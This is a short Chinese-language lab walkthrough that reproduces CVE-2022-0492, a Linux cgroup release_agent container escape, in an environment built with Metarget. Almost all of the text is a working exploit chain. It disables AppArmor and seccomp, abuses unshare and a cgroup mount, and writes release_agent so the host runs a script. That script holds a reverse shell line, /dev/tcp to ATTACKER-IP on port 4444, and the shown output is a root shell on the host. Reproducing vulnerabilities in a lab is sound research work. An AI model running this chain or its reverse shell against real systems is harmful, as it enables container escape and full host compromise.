请参考Unit42的文章。
宿主机环境:
- Ubuntu 18.04
首先切换内核,直接通过Metarget安装环境:
./metarget cnv install cve-2022-0492 --verbose基础环境准备(以Docker为例,如果已经有任意版本的Docker则可跳过):
./metarget gadget install docker --version 18.03.1首先在某处开启一个反弹shell监听:
# ATTACKER-IP
ncat -lvnp 4444接着创建一个禁用了AppArmor和Seccomp的容器进行复现:
root@test:~# docker run -it --security-opt apparmor=unconfined --security-opt seccomp=unconfined --rm ubuntu /bin/bash
root@dbfb1efb9b71:/# unshare -UrmC bash
root@dbfb1efb9b71:/# mount -it cgroup -o rdma cgroup /mnt
root@dbfb1efb9b71:/# d=`dirname $(ls -x /mnt/r* |head -n1)`
root@dbfb1efb9b71:/# mkdir -p $d/w;echo 1 >$d/w/notify_on_release
root@dbfb1efb9b71:/# printf '#!/bin/bash\n/bin/bash -i >& /dev/tcp/ATTACKER-IP/4444 0>&1' > /exp.sh; chmod 777 /exp.sh
root@dbfb1efb9b71:/# t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
root@dbfb1efb9b71:/# echo "$t/exp.sh" > $d/release_agent
root@dbfb1efb9b71:/# sh -c "echo 0 >$d/w/cgroup.procs"
在ATTACKER-IP处收到反弹shell:
...
Ncat: Connection from 1.2.3.4.
Ncat: Connection from 1.2.3.4:33868.
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
root@test:/#